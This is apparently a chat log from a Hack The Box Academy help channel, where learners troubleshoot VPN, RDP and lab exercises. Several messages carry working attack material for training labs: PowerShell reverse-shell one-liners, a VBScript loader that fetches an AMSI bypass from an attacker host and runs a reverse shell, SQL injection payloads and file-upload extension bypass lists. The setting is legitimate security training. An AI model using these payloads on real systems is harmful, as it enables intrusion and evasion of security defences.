Hey, i've been trying to get burpsutie working for the file upload attacks module but burpsuite has not been working. i've been trying to download and add the certificate to firefox but i am having a lot of trouble, and it seems like the system won't let me.

I'd recommend the reasy route and using burp's built in browser, no setup required.

quick question, when the modules have time like 7 days, does it equate to 7*24 or how many hours does that module usually take ?

hey guys, i need some help, i cannot seem to deploy a shell by exploiting through metasploit or manually, i have been trying for a while i am following every step and double checking all the configurations set on metasploit or the manual execution.

can someone tell me possible reasons that could happen ?

should i use a different vpn file ?

im using the eu 1 file if i remember correctly, i am in india though, does that affect in anyway

i am still getting exploit completed but no session was created

i cant even seem to find a workaround

update metasploit works fine on pwnbox

used that to get on with the module

i guess its my network setting on my vm i gotta see what i can do to fix it

It is 8 hours per day

But it usually takes twice or more to cover the module than suggested there

mind if i dmed you please?

Bro why is HTB releasing so many good Tier IV modules when im so broke please release more Tier III or something I beg 🙏

why there is no option to connect via openvpn?

the instance is probably a public ip and won't require a vpn

Sure, go ahead.

okk

Anybody know where I can get the tagged boxes lists mentioned here?

https://academy.hackthebox.com/academy-lab-relations/modules/using-the-metasploit-framework

Afternoon folks, struggling here with the end of AEN - can't get meterpreter to catch the reverse shell from the double pivot. Driving me up the wall tbh.

yo guys, im on windows privesc -> critix breakout

what im doing wrong here ?

Ah man, I wanna help but haven't done that module. I would just type ||cmd.exe|| and check what happensz

It used to work but when i restarted the machine it stopped working for some reason

@leaden island Please take care not to post content from modules above tier 0

Re-read the section that explains what to do, you're not doing it correctly

Ah sry gotcha

Doing Logrotate section within Linux Privilege Escalation module, feel like i'm doing something wrong though, unless logrotate actually only runs once an hour and I just have to wait for potentially an hour to get the flag? Not really used to that for Academy sections though

no you don't have to wait an hour, you trigger it

i think that vuln is very finnicky and it'll only work once, or for a short amount of time, so you have to reset

footprinting module, Lab easy. There I need to enum a DNS server

tried triggering it with ||logrotate -f -s /tmp/logrotate.status /etc/logrotate.d/mon|| but I think it executes as htb-student then since it doesn't write the payload to bash_completion.d

also don't get a connection to my listener when I do this ^

i love how in one section of the mssql/sscm module they teach you to use ligolo-ng for tunneling, but in the dedicated tunneling/pivoting module there's not even a mention 🙁

I'm pretty sure there's a backup directory that you should use for this lab. In the home directory I believe.

Do you still need help?

Did you figure it out?

Hi, in the "Attacking Authentication Mechanisims" module I am trying to access th vHosts to complete the exercise. But the hostnames are not resolving like academy.htb and sso.htb, anybody knmows how to do it?

Have you added them to the /etc/hosts file?

aaaahhh. Itts working now thanks

file transfer module, on section 8
i believe it should be "upload to target"

#1234357888114364508

oh, thanks

Unable to connect via RDP as mention in the question
any help?
Section3 Q2: attack&defense

confirm u can reach the machine with ping

Nope!
however other Windows machine is connected (10.) via RDP.
in that machine, used echo %LOGONSERVER%, there DC2 was mentioned instead of DC1

Figuured it out! thx

Stuck in Windows Privilege Escalation Skills Assessment - Part II

can someone help

Feel free to DM me and i'll try and help.

Hey guys, can i ping someone for Introduction to NoSQLi injection module

Managed to figure it out! Thanks anyways though!!

Brother, it's been a long time but I kept some notes, might be able to help

Thanks for the help

Is mdk4 tool is not avaliable in the module Attacking Wi-Fi protected setup the "Attacking Wi-Fi Protected Setup - Skills Assessment" section? It's the last one. I need to use it. Is is possible to download additional tools on the machine?

I bought a tier 3 module a week ago, but i haven't used it, & I'm not planning on using it either. Can i refund it for 500 cubes?

hi

Aight' thanks

Yes, i was putting the path in the wrong field

Hello, please, can you tell me why i can't RDP to https://academy.hackthebox.com/app/module/253/section/2811 :

RDP to 10.129.121.40 (ACADEMY-ADTRUST-CFSQL01), with user "Administrator" and password "HTB_@cademy_adm!"
I changed my VPN, rebooted the boxe. But the rdp isn't possible.

Establish an SSH dynamic portforwarding first

But first i want to rdp to 10.129.121.40 before the pivot

i don't even need to pivot if i'm RDP to this IP

The AD Trust module is very unstable

refer to https://academy.hackthebox.com/app/module/253/section/2809 (Lab Setup)

Sorry, I forgot, it's my fault, many thanks

I'm on the LFI skills assessment and what I did should have worked, but it didn't, and I even cross-checked it to a walkthrough. I don't know what to do

how did you proceed

Leverage sharpview with sliver.

DM please

Hello, I s the openvpn for academy change because i can't find it.

The VPN file is only available where it is needed

@acoustic owl Yes i know that but i don't see it for this modules Active Directory Enumeration & Attacks

Ok nvm i see now. Thanks

https://academy.hackthebox.com/app/module/143/section/1265

Hello

excuse me

for the introduction to sql injection, should i restrain myself from using sqlmap?

Yes it’s supposed to teach you how to manually do sql injection

there is a separate module for sqlmap

Okay okay

hmmmm

Adding on that, it's good to learn how to do stuff manually without full automation anyways.

For example, you could enter a big bounty that pays well but they want you to identify vulnerabilities manually.

haha i was doing it manually for 3 days that's why

but turned out i made a stupid assumption

it's too easy

i made an assumption because i thought -- won't work

because i forgot ) exists (later discovery, i didn't know it existed but i tried to use comment and i thought comment was filtered in the application)

Hi, I want to ask that are there any mentor of the modules in the penetration test?

feel free to ask questions and someone will answer them

thank you very much

help i was doing the windows fundamentals modeule i run pwn box connect to windows rdp and nowi have to do some wmi commands but on windows rdp only recycle bin showing

That’s normal on HTB Windows targets sometimes. You’re likely logged into a minimal desktop session. Use CMD and Powershell. The shell will work just fine

on linux shell ?

No, on windows

Press the windows symbol and search for powershell or CMD

worked thanks

o/

What is the alias set for the ipconfig.exe command?

i been putting ipconfig but its a wrong answer

what should i do

host unreachable ? what do i do?

Read the section again

Are you connected to the right VPN?

yes

can you see tun0 IP using ip a

yes

use the -Pn parameter

check whether it works

or Try a different VPN

ok let me try that

it works with another VPN

thanks

Hello 😁
I have a problem
I‘m completly new to HTB. I startet the forst moduls and Everything worked.
Now I‘m on the linux modul (Tier 0) and the target is not loading.
„Target(s)
Time left: 118min(s)
10.129.120.xxx“

(Im doing it with my iphone - safari browser)

bruhh

You intend to complete the module on a phone?

Looks like it loaded though

Yes 😅 most of the time i‘m not at my pc so I have to do such stuff on my phone.

how are you gonna complete a challenge on ur phone

I respect your dedication. You can read the articles and take notes on phone. But I'd prefer doing the labs on PC

so the ip is local which means you would need a vpn to connect to that ip have you done that?

imo better option would be to just do in your pc but if you really cant then just use pwnbox and rotate your phone to make it act like a pc

pwnbox is also auto connected to whatever network you need to be on to access that ip

does the pwnbox really function on a phone?

u can use it if as desktop if u rotate but i dunno how typing works but i guess u can ssh into it using the web terminal

oh ok

Huh... I guess that's a way of getting it done

Has anyone done the Using CrackMapExec Module who can give me a pointer on the Skills Assessment section? I'm stuck on Q2: Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt. So far, I've || got juliette's password and have used that against the MSSQL service on SQL01 and then escalated privileges to SYSADMIN but I can't seem to execute commands to reveal the flag? ||. Thanks.

dm please

Small question in the Introduction to Networking module Section 2,
It says here that both the client and the server are networking devices and uses Firewalls as an example but I thought that firewalls are just the security systems the monitors inbound and outbound traffic, is there also a device called firewall? can't seem to find it on google

physical firewall devices do exist

What are they? routers with firewall configuratoins?

hello guys

they are specialized devices for firewall configuration; https://www.sophos.com/en-us/cybersecurity-explained/firewall

Got it, thanks

i need help establishing a reverse shell in a windows RDP environment

Exactly which module is this? Can you copy a link?

the payloads module its a tier one module

https://academy.hackthebox.com/app/module/115/section/1106

it gives a script you can copy but in my instance its not working

and in later examples its kind of vague

also this might just be because i had to install xfreerdp and xquartz with homebrew to run it but the +clipboard addon isnt working its inconsistent

when i try to copy paste into the windows environment it sometimes works and sometimes doesnt

i dont know if its xquartz or the brew rdp proxy

xfreerdp is what is recommended, and there is a comment there about pasting from Pwnbox into notepad, so obviously others have had issues too through xfreerdp. I'm afraid past what it recommends in the section, I do not have any other suggestions. Perhaps someone else will comment with their experience 🙂

im not using pwnbox

im a free tier user

im using openvpn cli

the section recommends powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()” as a payload

but this simply doesnt work

and not because of AV settings like it assumes

Do you get any output?

errors

syntax errors

meaning the payload itself isnt parsing

also i figured out the clipboard issue

the +clipboard lets you copy your clipboard over like one time for some reason, you just have to restart quartz and xfreerdp each time

What is the syntax error specifically

The first one

It's interpreting the $ variables as being referenced, resulting in a corrupt payload

; = .GetStream(); it's missing ;$stream

that makes sense

i looked at the errors further

i encased it in quotes and it fixed most of the issues

Yeah, the double quotes in the example in the section are required. Also, different commandline interpreters interpret variables differently.. e.g. command prompt vs powershell (command prompt is mentioned specifically there..)

the double quotes alone werent enough i added more

im using powershell since cmd will likely react worse

i dont have experience with either so i dont really know the idfferences

That's your problem

Listen to what I'm saying

Use the command line, like it asks

i got the two confused

i thought it said to use powershell

let me try that

same errors it says a lot of the variables being called on are deprecated

i got somewhere

Great.

Just spun this up and didn't have any issues using Kali VM.

$client = New-Object System.Net.Sockets.TCPClient(’10.10.15.225’,7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

this one worked

i didnt try with my kali vm i wanted to try with mac but im using xquarts/xfreerdp for the remote host and installed all the tools with homebrew

my first issue was that i was running a cmd command in pwershell then i looked in cmd and realized that the cmd command kind of sucked and was overcomplicated and was running a powershell command anyways so i just took the raw command and pasted it into powershell

i dont know jack about windows only experience is using regedit and using it when i was younger

Guys, can anyone offer some advice? I’ve been trying to complete the ‘Kobold’ CTF. I spent 5 (out of 7) hours looking for the root flag, eventually gave up and looked at the solution (I didn’t submit the root flag, as that would have been unfair), and was really disappointed — I even wondered if I’d been thinking along the wrong lines or something like that… :/ Can anyone offer any advice on CTFs? I thought that after the initial stage I’d try my hand at seasonal competitions, but now I’m lying in bed, and I feel like I’ve dropped out of life

you should ask it in #boxes btw

I thought it’s more theory-oriented question, isn’t it?

Ok, sorry anyway

introduction to bash scripting 3 script control---flow control loops guys i am having a issue in this question of Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

you dont need -w 0

@peak forge STILL NOT WORKING

you should count the words after the loop

the chars i mean

echo your var, see what it contains, that way you will know what needs to happen

by putting in into a if else statment ??

(spoiler || you are missing the WordCount command || )

is this not not word count -- salt=${#var}

?

nope

so far, you are encoding into base64, and assigning that into salt

you are missing wc

i did this in my last script

i am noob in bash and linux 🙁

this is more of a programming skill

true

dm me so we dont fill this entire chat

i have known java and sql well but i did that years ago soo i am a bit rusty

Anyone done Wi-Fi Penetration Testing Basics - Skills Assessment under the Wi-Fi Penetration Testing Basics module? I'm having issues trying to connect to the Wi-Fi.

I got it.
-# If anyone needs help with this module, feel free to ping/PM me.

that module is above tier 0; please don't share code

mb sorry

Is the File Upload Attacks module's Whitelist Filters section broken? I've done the script suggested and added '.phar' '.phtml' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phpt' '.pgif' '.phtml' '.phtm' to the extensions, done it for jpg, jpeg, png, as well alternating the extension and escape characters. Also tried reading the old forums getting basically the exact solution some people used to generate the file names as well.

I get 403s for the ones that were supposed to have worked, and 404's for ones that didn't work. Using ffuf for the post and get because intruder is obnoxiously slow. Tried using -raw flag for ffuf and without as well

any vpn issues?

Guys, does the Academy VPN down?

Even in pwnbox shows no vpn

i think so, i cant do any exercise

I try to switch between TCP <--> UDP and all region (US and EU) seems no luck

Same here, issues with VPN. Even the pw box cannot can VPN IP

it seems to be down, i reinstalled the ovpn file to see if it was my fault but it doesnt

Same, VPN is down.

same here

@jolly cradle

im glad the issue wasnt on my end

Are you guys on US VPN Server?

Both US and EU are down (Either TCP or UDP)

im on EU

Ah I thought it was me, it says no VPN or tun0 from the pwnbox and also no route from the pwnbox to the VM (EU)

neither labs nor academy work

Yup, EU is down as well

This is just crazy WTF

US EAST LMAO

https://klipy.com/gifs/shocked-oh-my-god-12--k01KS3GBDJFBP03YN0DSRXSPA9E

hackthebox tweaking

for the optional exercise for filtering fuzzing output in web fuzzing module, there's one question and I got the value of the parameter but its not accepting it in the URL. I know I have the right wordlist and I think I actually have the right value. I don't want to post the URL here because its a spoiler. can I DM what I have and someone can tell me what I'm not getting?

I want to get this flag and take notes on the section before doing the next one even if its an optional section

I mean the flag is optional so I could just mark it as complete but I don't want to do that

I want to know I know it

can someone DM me?

sure

sorry this might have been asked already but I had unlocked a bunch of Modules on HTB Academy adn now I am locked out of them? Do I have to use cubes agian to unlock them?

I am not paying for a subscription atm but the modules were unlocked when I had the Silver Subscription, now I have modules half done and half locked 😂

You either need to get back your silver sub or buy them back with cubes, the only modules you keep access on are finished ones.

I see but that does not seem completely correct, I have others that I started during the Silver Sub and are still available and not completed

the ones locked are a bit arbitrary

like I have "ADCS Attacks" available to complete, yet the "Intro To Assembly" is locked

I definitely did not use cubes for "Information Gathering - Web Edition" or "Password Attacks" either... but again myabe these specific ones were unlocked with CPTS or CBBH and then updated later so I still have access to them?

oh well whatever

any module that you completed fully then was updated is still yours to access, yes they both received updates (a while ago)

yes I now understand, thank you for that

Hello,

I'm new to HTB and currently working through the Vulnerability Assessment course (Section 12/17 – Nessus Scanner).

I opened the Pwnbox to complete the questions, and I'm trying to access the Nessus URL, but I'm not sure if https://127.0.0.1:8834 is supposed to open the Nessus UI.

At the moment, https://127.0.0.1:8834 is not opening anything for me, so I wanted to check if this is the correct URL or if I'm missing any setup/configuration steps.

Thanks!

well.. that's localhost, the target spawn will have it on the relevant port

https://target_ip:8834 <-

thank you

Hello
I have a question regarding one of the questions in the CDSA Path
Incident Handling Process >> Detection & Analysis Stage (Part 1) >> Q2
I can't find the suitable answer pattern whatever I tried

||TECHRANGE\administrator||
||"TECHRANGE\administrator"||
||"TECHRANGE\administrator."||

is that my answer is wrong or the pattern is wrong

windows fundamentals what is serial number of the system answer keep getting wrong

I think I found a grammatical error in one of the modules.

Can someone give me a nudge on Whiltelist filters in the file upload attacks module? the payloads I've used alternate between '.phar' '.phtml' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phpt' '.pgif' '.phtml' '.phtm' to the extensions, .png .jpeg and .jpg, and all the character extensions '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':' '.' '\x00

outputting the resulting wordlist with this
echo "hack$char$ext$img" >> wordlist.txt
echo "hack$char$img$ext" >> wordlist.txt
echo "hack$ext$char$img" >> wordlist.txt
echo "hack$ext$img$char" >> wordlist.txt
echo "hack$img$char$ext" >> wordlist.txt
echo "hack$img$ext$char" >> wordlist.txt
echo "hack$ext$img" >> wordlist.txt
echo "hack$img$ext" >> wordlist.txt

All of the solutions online don't work, and this script is even more verbose than the solutions i've found online. I've been on it for daaayyys

The line if ip <>"1.2.3.4" then checks if the remote ip is 1.2.3.4, if not it will show a 404 Page Not Found.

omg I'm dumb

I'm working on https://academy.hackthebox.com/app/module/134/section/1175
The module mentions that using curl -i -X OPTIONS http://<IP>:<PORT> should give you the allowed HTTP methods in the Allow header in the response. However, I don't get the Allow header and instead get this:

HTTP/1.1 200 OK
Date: Thu, 21 May 2026 18:48:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1075
Content-Type: text/html; charset=UTF-8

Is that curl the right command?

options isn't enabled on that server

please delete bc spoilers for module above tier 0

wait, why is it not enabled on that server if the server is the target machine for the exercise? the page itself even guides through saying try the curl command on the target machine to see the Allow headers

because it's just not

i'm not staff so i can't tell you why they chose to do it that way

but not every practice environment will be 100% with what you read

trying pentest in a nutshell I know that the msfconsole thing doesn't work everytime but its not worked once for me and I can't figure out why. I think I have done everything right

edit: nvm I got it working using the machine on HTB

for the optional exercise in the filtering fuzzing output section of Web Fuzzing module, I got the fuzzer to get me the post parameter but when I go to the webpage it says incorrect parameter of y

I am confident I used the right wordlist and that the fuzzer worked

can someone help me with this?

anyone available for a DM?

are pwnbox instances currently at its capacity limits?

^

I dont have an option to use my vpn anymore

If you mean the option to connect doesn't show on every section any more, that's because it only shows on sections which require a VPN connection now 🙂

The option to spawn the Pwnbox will still display on interactive sections which do not require a VPN however, if you want to use the Pwnbox.

that makes sense. thank you for the clarification

Any advice on how to get around this or reset it or....?

I'm working on: https://academy.hackthebox.com/app/module/33/section/216
Im at the question:

Use a Union injection to get the result of 'user()'
Im passing into the searchbox:
|| ' UNION SELECT 1, user(), 3, 4-- -||
However, its just returning
you have an error in your sql syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1.

Not sure what im doing wrong here, can someone help?

I'm taking a look now to see if I can refresh my memory

Works for me. ¯_(ツ)_/¯

i'm guessing you goofed your last attempt with a misplaced character, but what you posted here works perfectly fine.

OH for the love of god user() is supposed to be capitalized

thx

I don't think that matters. I literally copied and pasted your example and it worked for me.

but i'm happy to hear you figured it out. Sometimes plugging dozens of attempts in to test gets hairy. I like to copy each attempt into a new line in notepad/mousepad so I can keep track of my iterations. It helps, but when you're doing it over and over you just make weird mistakes. My only guess at what hapened.

maybe, yea. thanks though!

I hope you're not from country where the thumbs up is offensive. Is there a universal "you got this" symbol that's not risking an international incident?

lol im from the east coast US, its fine

If you are still stuck on this you can DM as it's just easier with this type of section.

dns.resolver.LifetimeTimeout: The resolution lifetime expired after 3.104 seconds: Server Do53:10.129.3.17@53 answered The DNS operation timed out.

Can someone help please. It is happening python bloodhound on linux. My /etc/hosts file domains targets all correct
Command I am using:
sudo bloodhound-python -d inlanefreight.htb -c All -u htb-student -p HTBRocks! -ns 10.129.3.17 -k

curl using ur value , you already fuzzed it

i sent hint in dm

any issues with academy VPN to eu? or just me?

Did you pass Q1? Im stuck, machine looks bare naked, no hydra or wordlists. I obviously miss some easy solution.

Those rdp connections are absolute fucking shit, cannot complete the task cause I cannot fucking connect to the rdp from various machines: SNIP:
[11:26:16:199] [7681:00001e01] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - /from-stdin pass the credential via stdin
[11:26:16:199] [7681:00001e01] [WARN][com.freerdp.client.common.cmdline] - [warn_credential_args]: - set environment variable FREERDP_ASKPASS to have a gui tool query for credentials
[11:26:16:206] [7681:00001e03] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found
[11:26:16:206] [7681:00001e03] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: ZEHA: keycode: 0x5d -> no RDP scancode found
[11:26:17:004] [7681:00001e03] [WARN][com.freerdp.crypto] - [verify_cb]: Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:26:17:004] [7681:00001e03] [WARN][com.freerdp.crypto] - [verify_cb]: CN = DESKTOP-NU10MTO
[11:26:17:005] [7681:00001e03] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[11:26:17:005] [7681:00001e03] [ERROR][com.winpr.sspi.Kerberos] - [kerberos_AcquireCredentialsHandleA]: krb5_parse_name (Configuration file does not specify default realm [-1765328160])
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core] - [nla_recv_pdu]: ERRCONNECT_LOGON_FAILURE [0x00020014]
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x55581d73f060]: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x55581d73f060]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1]
[11:26:17:208] [7681:00001e03] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
SNIP

Even in the PwnBox, it is still failing to connect

How the fuck am I supposed to complete the task if I cannot connect to the fucking machine for two days

Module is "Windows Event Logs & Finding Evil"

Fix this module!

What is the command you are using, from which terminal (e.g. bash, cmd, etc)? I just tried it, and I can connect perfectly fine with the documented xfreerdp command @fallen arrow

xfreerdp /v:MachineIP /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /dynamic-resolution

And what type of terminal are you running that command from?

I am currently testing from the pwnbox which uses parrot terminal

Ok so bash or powershell, I've verified it's working here on both on the Pwnbox

bash

That's bash

It could've been powershell

Hence why I asked

True

I have restarted the machine, and maybe on the fifth new ip it worked now

But the problem is, it disconnects after like 1 minute

of running

If it disconnects repeatedly, you must have another VPN client trying to connect, which makes it fight for the session

Make sure you kill all other possible vpn clients you may have started elsewhere

has anyone had this issue before? when rdping to a lab box i get this:

Also check this article for some suggestions that have helped others that experience issues with RDP connections https://help.hackthebox.com/en/articles/12710285-connecting-to-academy-vpn#h_5a2b5ed58c

Mullvad is turned off on host

I mean any other openvpn clients using the same ovpn config file, multiple clients trying to connect with the same config will cause each other to repeatedly disconnect and reconnect

https://help.hackthebox.com/en/articles/12710285-connecting-to-academy-vpn
Try changing to tcp per pwnbox instructions here

Check your VPN log on the Pwnbox, see if it is repeatedly disconnecting and reconnecting over and over

or yeah, try switching to TCP, and checking the other steps that have helped others with RDP connections in the above article we shared

Does it matter if the vpn tcp or udp files are old?

Because I have access to the target, it's just the rdp that is messing with me

Can you check the VPN logs and see what is output when you notice the connection dropping first please?

Before we start worrying with updating the VPN from UDP to TCP (which shouldn't really be needed if you're using the Pwnbox), let's see if there is an issue shown in the logs

So, I tested, and it doesn't wanna work on my Kali machine, both with udp and tcp. On pwnbox, it works but not from first time

I'd suggest reaching out to support, I'm trying to help but I'm not getting the information I need to help you, so yeah, support will be the people to speak to

https://help.hackthebox.com/en/articles/13645526-contacting-academy-support

Alright, thanks

I'm doing the Attacking Common Web Applications module, specifically the Attacking Wordpress section (4), and i'm supposed to be able to access the theme name under /wp-content/themes/<theme name>, but it only works for 1 theme (transport-gravity), in the walkthrough it uses twentynineteen, but all the others also don't work. I just get a "This page isn't working" response. Also if I go to the parent directory, so just /wp-content/themes, it's jsut a white page without any content. I am supposed to put a web shell under the 404.php page, but I cannot access it, even for the only theme that I can access under /wp-content/themes/transport-gravity (curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php -> no response). What am I missing?

Hey all! I don't wanna post spoilers. I'm working on the Attack Enterprise Networks module, but stuck on gaining privilege escalation for the DDN. Has anyone finished this module yet?

if you are trying to do it blind, take breaks and try again later, if not, the module itself explains how to do it

100%. Will try to go through it more slowly. I've been stuck on it for the past few days. I can get half way, but can't achieve PE.

its possible you are missing important enumeration steps, if its local privesc, check again hack the box module for that, go through each enumeration step and see what exactly your current user can do

Gonna do that, thanks!

usually service accounts have the same privesc steps, if your user cant do much, make sure to properly enumerate the files in the host, for creds and stuff like that

the idea of doing it blind is to simulate the exam, you wont be able to ask for hints during cpts, so learn to keep calm and retrace steps

Probably doesn't help that I haven't done Windows Priviledge Escalation module yet lol

oh....... for sure

you shouldnt have skipped that one

Gonna start it now, appreciate the chat! ❤️

What is the password mcharles uses for OneDrive?

https://klipy.com/gifs/shush

for the Password Attacks Module - Credential Hunting in network shares, Snaffler's output is too messy to read. How do I clean it up / make sense of it?

Yes! I couldn't get colors or better formatting natively. But heres my cheat:

If you're working through a shell, recommend combining Snaffler with SnafflerParser (link to raw script, curl it) so you can take the output and transfer to a Windows system then parse the output for clearer reading (I can't figure out a better way to get colors out of snaffler when running through a webshell or meterpreter).

https://raw.githubusercontent.com/zh54321/SnafflerParser/refs/heads/main/snafflerParser.ps1

Thank you it looks good. i've checked the README briefly
my attacker machine is a linux machine, how would you recommend I go about using this?

Explorer ++ is also required based on the Usage section

Honestly I don't remember anything beyond the same problem you mentioned and my notes for a solution. I could have transferred the results to a windows VM hosted locally on my system.

anyone?

DM?

I am currently working through HTB Academy Linux Privilege Escalation and embarrasingly I cannot find the latest python version?

I found all packages installed, tried the version numbers, package version, executable version id (python3.xx) and so forth but nothing is being accepted

https://academy.hackthebox.com/app/module/51/section/1777

multiple python versions may be installed 😉

Just to confirm, I found 6 python versions including minimals

I feel like for a Tier 2, I could possibly be overthinking

... yeah nvm I definitely over thought, for anyone in the future, you do not need the patch number included

yeah you don't need any patch/subversions

just a.b

Module: Introduction to Windows Evasion Techniques
Section: Skills Assessment II
Question: Your task is to develop a VBScript payload. Once ready, place the .vbs file inside C:\Alpha\SA2 and wait up to a minute for the victim to run their checks, and then execute the file. The command your payload will be executed with is: 'C:\Windows\System32\wscript.exe <YOUR FILE>'. One thing you should keep in mind is that Windows Script Host (wscript.exe) makes use of AMSI.

Hey :). I managed to modify the provided VBA script template to download an AMSI bypass script (powershell) from my linux host and execute it, then, the VBA script immediately executes a reverse shell executable which is not detected by Defender (the one from dynamic analysis section).

Here's the script:

Dim objShell
Set objShell = CreateObject("WScript.Shell")
dim psCmd
psCmd = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ""(New-Object Net.WebClient).DownloadString('http://10.10.14.27/amsi-bypass2.ps1')|IEX; C:\windows\tasks\revshell.exe"""
objShell.Run psCmd, 0, True
Set objShell = Nothing

If I execute the specified command (C:\Windows\System32\wscript.exe C:\windows\tasks\revshell.exe), it does work just fine and I receive the shell as the user I'm already logged in. However, if I place the VBA script in the specified folder, the automated user seems to execute the script but I don't receive the revshell. The log file keeps saying Timeout reached, killing process.

Any help is appretiated.

Howdy!

I'm having trouble with the Password Attacks – Skills Assessment. As soon as I SSH into DMZ01 (1st target), the connection freezes after ~10 seconds and I'm unable to run any further commands — the terminal just hangs with no error message.

My setup:

• Kali Linux (virtualized on a Mac M3)
• Connected via VPN with a stable connection

I've already tried respawning the machine, but the issue persists. Has anyone else run into this? Any tips would be appreciated!

Is anyone having problems with Nessus Skills Assessments?

Hi, I’m having an issue with the API model training course. When I try to visit the machine IP address, it does not work or load properly. Could you please help me check and resolve the issue?

Nvm, I ended up exfiltrating the flag as an HTTP request to my attacker machine. Couldn't get a reverse shell. Btw; Seems like (New-Object Net.WebClient)... is blocked but Invoke-RestMethod is not...

Hi guys, I am solving Shells & Payload's live engagement. I am trying to exploit Host 3 (lab.inlanefreight.local), but Host 3 is unreachable. I have been trying for a whole day, yet no luck. I am attaching the screenshot of the host file and the error page in the foothold machine. Also, I have tried to access non-HTTPS, but it is redirecting me to HTTPS even after turning off the HTTPS Everywhere plugin. Also, I have used curl to get a webpage, but curl cannot reach it

Please, please, please, help me out here!! Thank you!!

Sounds like a network problem

BTW now that i see it, shouldn't you include the main domain on /etc/hosts?

I've always done it like that, inlanefreight.local lab.inlanefreight.local

can you ping the ip? if not maybe respawn the target. if that doesn't work killall -9 openvpn, then redownload the vpn file and use that one to connect. also make sure you aren't conected to the VPN while having spawned the Pwnbox at the same time.

doesn't really matter as they're using the IP anyway

I am afraid, I can't ping the ip. And I have also launched the instance multiple times. I have followed your instruction, download a new vpn file, connected it via openvpn, accessed the foothold pc via RDP, but still cannot access the lab.inlanefreight.local using the foothold pc.

It's a network problem

are you using the pwnbox or a vpn

or have you also spawned the pwnbox?

https://cdn.discordapp.com/attachments/1206130345443852301/1297426971101495377/real_sob.gif

don't recall lab.inlanefreight.local being part of that assessment

i also see you're using https; most of the internal stuff uses http, not https -- but again it's been a minute mind linking the section so i can double check the engagement text?

Remove https
Use http

You are supposed to RDP into the foothold, which it looks like you did as I can see htb-student@skills-foothold. From the foothold you should be targeting the other hosts.

Okay finally I figured it out, why does the file upload AND access work with uploading manually in the UI or with CURL but not when that exact same filename is in a script and fuzzed with FFUF using the exact request as cURL? Even though the successful filename in the generated wordlist appears multiple times, it doesn't seem to actually upload. Is it a problem with FFUF or the server getting slammed too quickly and not actually uploading anything?

Like literally nothing was actually uploaded, because when I do cmd=ls it doesn't show any thing I actually uploaded even though they all returned 200

Hi all, I'm on the "Drupal - Discovery & Enumeration section" of the attacking common application module.

The question asks us to find the version of drupal, so i run the droopescan scan drupal -u http://drupal-qa.inlanefreight.local

But, half way through the scan, it will shows remote connection error

I have restarted the target, still same. I also add -t 2 to reduce the threads of the scan, still get the error.

Anyone have idea how to solve this?

No, I haven't spawn the pwnbox. I am using Open VPN in my windows. I have been able to exploit the other two hosts, but can't even access the 3rd host.

open vpn in windows while running a kali vm? try running the vpn on the vm instead of your host

I launched the Kali VM later, but even when it wasn't running I couldn’t access the 3rd host via RDP.

i'd recommend vpn on the vm directly

maybe reboot your computer

Well, I tried to access it with HTTP, but I am getting redirected to HTTPS version, so I turned off the HTTPS everywhere, but still no luck. Then, I used curl to fetch the site directly, still no luck. Can't even ping it.

Okay, let me try this

Thank you!!!

if that doesn't work, restart your whole PC, fire up the VM, within the VM delete the existing VPN file, change regions, use tcp vpn, and then connect to it and try

sent a FR

host 3 yeah? nothing i'm remembering says that it needs to be interacted with via http

doing the password attack modul on htb i cant find the vpn file to download

if the section requires it it'll be a tab next to the pwnbox; some of the sections are against public containers (ip:port) and don't require the vpn

but i cant even ping th ip adress

how am i meant to ssh to it

ssh has a method for you to specify the port, -p

well interesting i guess i need to find myw ay around this modul

thanks

but i stilll some how feel there should be a vpn file here becaus i try to search other modules to find one i cant ...its like all of them disappeard

as stated, if the section requires it, you should be given the option -- quick shorthand to remember if i does:
10.129.x.x -> vpn required
ip:port -> vpn not required

yap 10.129 ... i was correct vpn required

and its not giving me an options to download one

module is password attacks

link the section

you also don't need a new vpn for each section, just one for all of academy

